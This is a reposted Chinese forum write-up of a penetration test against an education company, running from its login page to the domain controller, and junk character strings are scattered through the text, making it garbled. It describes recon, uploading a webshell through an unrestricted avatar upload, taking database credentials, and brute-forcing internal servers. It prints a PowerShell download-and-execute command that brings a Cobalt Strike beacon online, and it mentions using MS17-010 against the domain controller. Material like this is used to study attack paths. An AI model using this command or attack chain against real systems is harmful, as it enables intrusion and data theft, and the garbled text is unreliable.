" G0 Z W/ U! J' ~0 k) g/ ] 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
, x+ R" Z( l: f/ ? 0 P* P) G2 T9 \5 V# j" N
: h% ]; `; |6 E2 E$ [
6 R5 V# M. e7 _ {5 f- B8 u
. t% |$ t5 p% h/ w: _' r- ~$ K8 n5 V9 I9 d8 j: y" h9 D8 T
正文
9 `2 B) G5 }* c 3 \$ f, u$ v, X; N. E
) ]5 E% g' h! ?- h+ q& T
$ n' j+ h4 a$ m+ j
( d3 L$ z2 N2 W, a4 B
) e q( B( [1 v
目标:www.xxxx.com(一家教育机构) 1 S' M& y0 \' F: m' L# n- U
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
# b9 d- B: l. {8 g' Q4 B q& e3 n ; w' o) j z- X+ c$ ?0 {7 v7 j) c
% `! e+ q# ~* s' K / Q; W, m$ o F. @& b# E
0 Q4 h. e* n8 \0 r) _
4 E! s7 D5 d+ A5 h
进行了简单的信息搜集
* E% g) b6 Y4 t' |
+ Y) D- C" I" a" N) A6 S# Z" t. M( o0 y
3 y. r& S3 m, l . b7 @* N* l/ |
! {( S! r! v, ^0 Q! M
子域名搜集% q* [* Q' j3 Z5 l& U9 v8 n
4 A& s& ?# U2 X! \
* h: f* v7 j" Q% _, P4 @8 k% }
$ p4 W1 e, X9 Q7 L
; l. `% W- C$ Y! W; N; \+ g( N' z
fofa找资产 1 `' v1 l) o) ~7 h1 n
: P% X, D0 ` B
3 M9 n, p9 h" W$ M, {
/ T! |' \9 w0 c- l; g. j8 D' ~ K0 \& N; h- Z# X6 ^; d" v
0 u4 T2 e/ }9 M1 m- ^- [ ) A! t! k7 X9 ~
' L) v( @' V3 W& {. L5 N 一共七个资产。去重之后只有两个。
/ f* T1 m1 p$ h
* |# {- k( o$ k' d6 G7 d D0 X3 K, p
( X& K/ q0 v$ k
, Z3 ^4 d$ P% g1 t G- u, a2 J/ A: W1 A6 P& O
目录探测, J: u: [) W9 W% r8 C. B
* f# [! F% ?1 w" `: S$ ]) _
1 _1 w x7 u' S- ]2 g( s # X8 t1 j! U) y9 u c5 g; p- w
2 ^" X& _ e* ~/ x8 V* T+ C5 K
, H H; K( h, _5 h2 K 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
, ^/ ]6 f3 M3 g D* J/ T) F# n
8 n7 @, G' u! W8 o" F
+ o3 |: X- `8 @8 ~3 j 6 U0 d c8 J6 |# n: U' x
2 a! {. }( Y" U7 k2 Y
我又尝试了通过修改返回包来绕过登录界面$ C- H) ]! [4 U5 H4 Z$ m
6 \. j( j+ Y" p! W& g; a5 r# b( U0 R; f, H
, `7 ~5 D; W+ g" _1 u
5 P9 F- H$ m: E3 ^7 e
. K& ~& I& K4 y6 _. A5 n. m4 h 还是不行,尝试注入无果( V* x) I; N0 D4 p+ I% B" D
$ Y1 q: W: o8 ?. r; g! ]4 u" r
, j: [+ h& T. G- ~ M
! T; y; y/ b9 u* U1 q7 i 1 Q t8 }. O# F, L& i) t
: V1 B- n$ m J% B 不过我目录探测出了一处Spring信息泄露 6 i' \$ G! {, q5 L
4 ~6 u' d7 h6 F1 \' x6 U
$ T5 F( N* Z& Q3 {
3 L/ Y/ [! B, U. e( b, T# V0 j+ Z# D
e+ |1 ]* h5 o9 S
+ u" |6 z; q/ F
+ I, K3 _$ N3 S, G 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
8 S# m/ Q% _0 Y2 D6 a
- }& o& T( p9 f' l4 \( u9 Q4 O+ S" E+ h) E6 C
/ Q0 j+ T) S- V# h
% l8 P" O' k# J5 l, R* ~+ _& s
6 p' q1 V# R( b# W7 R4 l& [
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。& k7 L% y) l$ K" ~( ~
( e+ ~* ] P) j' Q/ B
. i3 P c; {0 f 8 v/ ?1 i; j5 l; j9 `
# H& ^' s2 u& \. C! `; x: }1 y
; n; j2 r" D) t* K 获取有些师傅到这一步就手机抓包电脑测了。
0 `1 L( w% F3 C5 s6 u $ r |' J2 ~# p
1 [" n3 ]* G3 S; Z8 U, M* I
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。3 k7 l' D$ } z- `9 w
( r! H. i8 A( ]2 t6 U! _) a( u& N7 k9 N- U
其中在一个公众号发现了小程序,可以进行注册。( k6 S1 K; b9 }# A; U
0 U6 x8 o i9 t( W' z4 {4 W' Y$ N. d2 l- D
看到了头像上传,尝试上传获取WebShell+ r4 S" X, b! T* D
# i4 Z( y" E1 e( M! n6 w3 u
q! J j) c$ R* e9 D2 o" U: s) _+ D % T- R: J4 a. }8 R. L
) d# s. | [* U/ h2 e8 I& Y
# }& I* u3 {/ T. A! V 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
3 d/ A1 \+ e7 S. T
1 p$ r5 @: {1 |1 w) ]% [7 i! B- R! L
) y$ ~5 t3 {% v3 q; I1 u1 Y8 [
4 e: W8 g/ r+ s3 d ' ]3 @' V0 f: U
9 O3 h8 s4 y: k# G+ N o: c 然后上了大马5 w# p/ M. @* y8 F: c; H
4 Q1 m" q8 R& @! O# d" g1 G( }, P
- i7 `2 t& w% O 1 O, R) r R6 s7 a
3 x& n% b3 m2 G, G7 I; J# n7 f
' @6 \* h' D2 F2 k
3 J+ @* Q2 `4 n- }+ C0 d7 o$ l1 ?, c b- U1 D. p# L/ T6 w: b# p9 ^: q3 D
: q B `8 i$ n. @% B 通过翻找文件发现数据库账号密码
% v, d2 N( L- y( |+ Y1 t
$ V9 Y' P- O% D! I1 i. b& L9 q$ ~. m: }: Z1 d+ E3 J8 n* e$ B
1 u- T, }* \5 K# P0 n6 M
" h% t9 E" ^2 r p0 j, S3 M6 q" X
6 e% w* E6 o. A" ? --内网渗透! `8 Y9 s8 |; Q8 m/ V- H% \1 V
: t6 w! F( c6 d5 Y0 q% y
0 I- b, l5 g$ Q) ^* a! N
直接通过powershell执行 cs上线# H* N. X h$ a
3 G1 \% c0 U! x' o: j' F2 M# D8 ?1 Q# O* B. v9 S' x
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
, d! g8 v. {, B ; S! f' x! m+ y! C6 l7 U# m
# d( f1 C: F. _% u, h& O) D
9 e. ?. ^# a5 k9 l1 S; R8 L- g# z
* v) [0 r# Q3 v8 C7 j0 D; i6 i
& T) K( T" o. _) w2 l 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
. ]0 C5 U# c; s; n. B- R8 m
, j9 U$ N6 c0 j: g6 F, W/ i+ e' O% e4 ~/ H# Y8 [+ h2 {
1 p' T# w& @6 z. }
# V4 q% E( ?! F
% x1 J0 R: C# Y- ~" e5 V 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 . z$ t6 h; R* K V; E& y, W( \. D6 g
4 r( c. n& D+ e! ~% _8 d( W
9 O0 s* Z4 \+ i; x, X {% b% w$ i+ R5 R. e" }1 z% k
" a7 M. x# B! X9 I* n
' |: N4 [- r" P0 n3 g 6 A8 Z0 F1 b$ i) T
1 J6 f9 _+ M4 J( N8 U: r
' m. a) ]6 P% [: t, B- v 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
5 x9 h1 {6 e7 U: [1 N9 b% n* ]
! G# @2 w* c6 ]
! `9 ?6 g, A3 z& ?( L+ \
& ?. F( Q z2 _" p' S! I0 e6 K3 g5 c3 k8 r5 \7 c. J+ P
( c- X( T: t1 a2 u5 t7 j
( M. w4 ^: c* |5 \- v
2 @4 j7 K" |. [! H- a1 ~: `
$ r, V$ f. ~2 D& N0 K
% M' F; J* l: @3 N3 n: P# l
" t; p$ c7 ~: |1 i/ X
7 w1 Z$ i+ z6 O, G" b% K# E
3 F: j0 [6 A3 S+ k0 ^, t. d9 H* V2 y9 T0 [ 0 V0 J: f2 e: b/ l& G% q- \
3 v) H( h2 j) S) d8 p
2 C4 N m/ }( x4 Y) B) ], ^ 小结" I: W7 s. a/ d" u1 f
6 T5 k# I! u9 k' G
) L1 z% a- P# ~# h
" h1 @/ i& Y2 G, A8 H1 m 2 q3 Y! K3 B. B2 G
- ]# y7 T+ N% J: ]7 ]0 x" \ 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!7 [0 Y* [) Y: b
( E) Y4 ?6 K0 k, J
% ^: P) A, ]; S) `3 n
9 R: z K9 m) y" P! ]) M # ~; q7 y% ]2 G5 H5 `. R( l7 D
, {3 l ^3 h; n; c
-
5 x+ r; h5 D2 e * B+ X; g. e/ N5 s S+ k' ]
\2 P3 F0 L' w% P7 ?( Y3 n$ @
- 6 `! t' o; M& G
) t* s! g! r4 F& f1 e- h- k7 H- J( s
+ H* s" I0 n: C P! i9 B & h& w- W) N9 B: U b
. L$ E9 s8 z% v/ B7 t! @
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html0 y8 x! R/ ]0 u5 L; S% ]
1 f. a! u+ @; _6 v% O; x; ]6 i4 o% v; m; {: M0 O# X
0 w& x8 {1 z' A8 n; r4 ?6 g6 D! x |